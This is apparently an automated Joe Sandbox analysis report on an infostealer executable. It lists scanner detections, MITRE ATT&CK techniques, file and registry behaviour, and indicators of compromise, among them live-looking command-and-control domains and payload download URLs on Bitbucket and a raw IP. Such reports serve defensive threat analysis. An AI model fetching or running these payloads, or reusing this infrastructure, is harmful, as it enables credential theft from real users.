                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: number of queries: 1001
                Source: Yara matchFile source: 00000000.00000003.1400999806.0000000001224000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1378457678.0000000001224000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1401787404.0000000001225000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1378025809.0000000001224000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: FBmz85HS0d.exe PID: 7312, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: FBmz85HS0d.exe PID: 7312, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation
                1
                DLL Side-Loading
                2
                Process Injection
                34
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                Query Registry
                Remote Services1
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                2
                Process Injection
                LSASS Memory751
                Security Software Discovery
                Remote Desktop Protocol41
                Data from Local System
                1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information
                Security Account Manager34
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                Obfuscated Files or Information
                NTDS2
                Process Discovery
                Distributed Component Object ModelInput Capture114
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing
                LSA Secrets2
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials223
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                FBmz85HS0d.exe61%ReversingLabsWin32.Infostealer.Tinba
                FBmz85HS0d.exe100%AviraTR/Crypt.TPM.Gen
                FBmz85HS0d.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                s3-w.us-east-1.amazonaws.com
                3.5.25.82
                truefalse
                  high
                  bitbucket.org
                  185.166.143.50
                  truefalse
                    high
                    cuddlyready.xyz
                    172.67.150.173
                    truefalse
                      high
                      bbuseruploads.s3.amazonaws.com
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        sendypaster.xyzfalse
                          high
                          steppriflej.xyzfalse
                            high
                            smash-boiling.cyoufalse
                              high
                              https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exefalse
                                high
                                supporse-comment.cyoufalse
                                  high
                                  hosue-billowy.cyoufalse
                                    high
                                    cuddlyready.xyzfalse
                                      high
                                      ripe-blade.cyoufalse
                                        high
                                        greywe-snotty.cyoufalse
                                          high
                                          https://cuddlyready.xyz/apifalse
                                            high
                                            pollution-raker.cyoufalse
                                              high
                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://bitbucket.org/RFBmz85HS0d.exe, 00000000.00000002.1875057545.0000000001277000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1554154884.0000000001260000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0FBmz85HS0d.exe, 00000000.00000003.1379525182.0000000005900000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://duckduckgo.com/chrome_newtabFBmz85HS0d.exe, 00000000.00000003.1328496994.000000000593B000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328246456.000000000593E000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328645582.000000000593B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-FBmz85HS0d.exe, 00000000.00000003.1554154884.0000000001260000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1875034913.0000000001263000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://duckduckgo.com/ac/?q=FBmz85HS0d.exe, 00000000.00000003.1328496994.000000000593B000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328246456.000000000593E000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328645582.000000000593B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://cuddlyready.xyz/apitFBmz85HS0d.exe, 00000000.00000003.1400999806.0000000001224000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://cuddlyready.xyz/piFBmz85HS0d.exe, 00000000.00000003.1378457678.0000000001224000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1400999806.0000000001224000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1874782719.0000000001215000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1427541815.0000000001224000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1401787404.0000000001225000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1378025809.0000000001224000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1482628618.0000000001224000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://cuddlyready.xyz/FBmz85HS0d.exe, 00000000.00000003.1401268894.0000000001208000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1554154884.0000000001260000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1875034913.0000000001263000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1401268894.00000000011FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://cuddlyready.xyz/apilFBmz85HS0d.exe, 00000000.00000002.1874782719.0000000001215000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://cuddlyready.xyz/6xFBmz85HS0d.exe, 00000000.00000003.1427588716.0000000001208000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=FBmz85HS0d.exe, 00000000.00000003.1328496994.000000000593B000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328246456.000000000593E000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328645582.000000000593B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netFBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://cuddlyready.xyz/dFBmz85HS0d.exe, 00000000.00000003.1401268894.0000000001208000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://remote-app-switcher.prod-east.frontend.public.atl-paas.netFBmz85HS0d.exe, 00000000.00000003.1554179926.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877067862.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://x1.c.lencr.org/0FBmz85HS0d.exe, 00000000.00000003.1378243759.000000000592B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://x1.i.lencr.org/0FBmz85HS0d.exe, 00000000.00000003.1378243759.000000000592B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0FBmz85HS0d.exe, 00000000.00000002.1874658046.0000000000EFA000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchFBmz85HS0d.exe, 00000000.00000003.1328496994.000000000593B000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328246456.000000000593E000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328645582.000000000593B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://cuddlyready.xyz/sFBmz85HS0d.exe, 00000000.00000003.1427588716.0000000001208000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://aui-cdn.atlassian.com/FBmz85HS0d.exe, 00000000.00000002.1877067862.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://support.mozilla.org/products/firefoxgro.allFBmz85HS0d.exe, 00000000.00000003.1379201985.0000000005A12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://cuddlyready.xyz/er.xiKFBmz85HS0d.exe, 00000000.00000003.1427588716.0000000001208000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://bitbucket.org/FBmz85HS0d.exe, 00000000.00000002.1875057545.0000000001277000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1554154884.0000000001260000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.netFBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoFBmz85HS0d.exe, 00000000.00000003.1328496994.000000000593B000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328246456.000000000593E000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328645582.000000000593B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://web-security-reports.services.atlassian.com/csp-report/bb-websiteFBmz85HS0d.exe, 00000000.00000003.1554179926.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877067862.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.FBmz85HS0d.exe, 00000000.00000003.1379525182.0000000005900000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=FBmz85HS0d.exe, 00000000.00000003.1328496994.000000000593B000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328246456.000000000593E000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328645582.000000000593B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://crl.rootca1.amazontrust.com/rootca1.crl0FBmz85HS0d.exe, 00000000.00000003.1378243759.000000000592B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://upx.sf.netAmcache.hve.11.drfalse
                                                                                                              high
                                                                                                              http://185.215.113.16/off/def.exentmjFBmz85HS0d.exe, 00000000.00000002.1875057545.0000000001277000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1554154884.0000000001260000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                http://ocsp.rootca1.amazontrust.com0:FBmz85HS0d.exe, 00000000.00000003.1378243759.000000000592B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://nsis.sf.net/NSIS_ErrorErrorFBmz85HS0d.exe, 00000000.00000003.1553814190.0000000005925000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1553777662.00000000059A9000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1557542576.00000000059A9000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877911381.0000000006039000.00000002.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1553935100.00000000058F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.ecosia.org/newtab/FBmz85HS0d.exe, 00000000.00000003.1328496994.000000000593B000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328246456.000000000593E000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328645582.000000000593B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://cuddlyready.xyz/apiBFBmz85HS0d.exe, 00000000.00000003.1400999806.0000000001224000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1401787404.0000000001225000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1405842571.0000000001273000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1427375694.0000000001277000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brFBmz85HS0d.exe, 00000000.00000003.1379201985.0000000005A12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://cuddlyready.xyz/nxFBmz85HS0d.exe, 00000000.00000003.1401268894.0000000001208000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://dz8aopenkvv6s.cloudfront.netFBmz85HS0d.exe, 00000000.00000003.1554179926.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877067862.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://ac.ecosia.org/autocomplete?q=FBmz85HS0d.exe, 00000000.00000003.1328496994.000000000593B000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328246456.000000000593E000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328645582.000000000593B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://cuddlyready.xyz/apiiceFBmz85HS0d.exe, 00000000.00000003.1427375694.0000000001277000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://cuddlyready.xyz:443/apiFBmz85HS0d.exe, 00000000.00000003.1446443931.0000000001273000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://crl.microFBmz85HS0d.exe, 00000000.00000003.1378457678.0000000001224000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1400999806.0000000001224000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1446155060.0000000001254000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1427541815.0000000001224000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1482458559.0000000001260000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1401787404.0000000001225000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1446552557.0000000001254000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1378025809.0000000001224000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgFBmz85HS0d.exe, 00000000.00000003.1379525182.0000000005900000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netFBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://cdn.cookielaw.org/FBmz85HS0d.exe, 00000000.00000002.1877067862.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?FBmz85HS0d.exe, 00000000.00000003.1378243759.000000000592B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&uFBmz85HS0d.exe, 00000000.00000003.1379525182.0000000005900000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9eFBmz85HS0d.exe, 00000000.00000003.1379525182.0000000005900000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgFBmz85HS0d.exe, 00000000.00000003.1379525182.0000000005900000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://remote-app-switcher.stg-east.frontend.public.atl-paas.netFBmz85HS0d.exe, 00000000.00000003.1554179926.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877067862.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://185.215.113.16/off/def.exeFBmz85HS0d.exe, 00000000.00000002.1875057545.0000000001277000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1554154884.0000000001260000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=FBmz85HS0d.exe, 00000000.00000003.1328496994.000000000593B000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328246456.000000000593E000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328645582.000000000593B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://bbuseruploads.s3.amazonaws.com/FBmz85HS0d.exe, 00000000.00000003.1554154884.0000000001260000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://cuddlyready.xyz/apingFBmz85HS0d.exe, 00000000.00000003.1427375694.0000000001287000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1446443931.0000000001287000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&ctaFBmz85HS0d.exe, 00000000.00000003.1379525182.0000000005900000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                  172.67.150.173
                                                                                                                                                                  cuddlyready.xyzUnited States
                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                  3.5.25.82
                                                                                                                                                                  s3-w.us-east-1.amazonaws.comUnited States
                                                                                                                                                                  14618AMAZON-AESUSfalse
                                                                                                                                                                  185.166.143.50
                                                                                                                                                                  bitbucket.orgGermany
                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                  Analysis ID:1579799
                                                                                                                                                                  Start date and time:2024-12-23 09:22:30 +01:00
                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                  Overall analysis duration:0h 6m 16s
                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                  Report type:full
                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                  Number of analysed new started processes analysed:16
                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                  Technologies:
                                                                                                                                                                  • HCA enabled
                                                                                                                                                                  • EGA enabled
                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                  Sample name:FBmz85HS0d.exe
                                                                                                                                                                  renamed because original name is a hash value
                                                                                                                                                                  Original Sample Name:30669d81a7fc7b2867ecc452ce55d1d9.exe
                                                                                                                                                                  Detection:MAL
                                                                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@2/5@3/3
                                                                                                                                                                  EGA Information:Failed
                                                                                                                                                                  HCA Information:Failed
                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 20.42.73.29, 13.107.246.63, 172.202.163.200, 40.126.53.7
                                                                                                                                                                  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                  • Execution Graph export aborted for target FBmz85HS0d.exe, PID 7312 because there are no executed function
                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                  • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                  • VT rate limit hit for: FBmz85HS0d.exe
                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                  03:23:29API Interceptor23x Sleep call for process: FBmz85HS0d.exe modified
                                                                                                                                                                  05:13:04API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  172.67.150.173RDFchOT4i0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • artemis-rat.comartemis-rat.com:443
                                                                                                                                                                  063837646WAYBILLMAR24.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                  • artemis-rat.comartemis-rat.com:443
                                                                                                                                                                  SecuriteInfo.com.Trojan.DownLoaderNET.943.16578.26938.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • artemis-rat.comartemis-rat.com:443
                                                                                                                                                                  DHL- Shipping invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                  • artemis-rat.comartemis-rat.com:443
                                                                                                                                                                  DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                  • artemis-rat.comartemis-rat.com:443
                                                                                                                                                                  Kazeem Engineering and Technical Services.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                  • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                                                                                                                                                  POs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                  • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                                                                                                                                                  PO-065-01-2024E-2.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                  • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
